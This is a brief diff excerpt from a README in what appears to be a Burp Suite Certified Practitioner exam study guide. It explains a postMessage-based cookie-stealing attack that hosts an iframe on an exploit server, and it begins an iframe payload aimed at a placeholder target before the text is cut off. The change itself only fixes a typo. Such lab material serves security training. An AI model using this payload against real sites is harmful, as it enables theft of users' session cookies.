botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 >To exploit the above code, inject JavaScript into the **JSON** data to change "load-channel" field data and steal document cookie.

 >Host an **iframe** on the exploit server html body, and send it to the victim, resulting in the stealing of their cookie.
-The victim cookie is sned to the Burp collaboration server.
+The victim cookie is send to the Burp collaboration server.

 ```html
 <iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({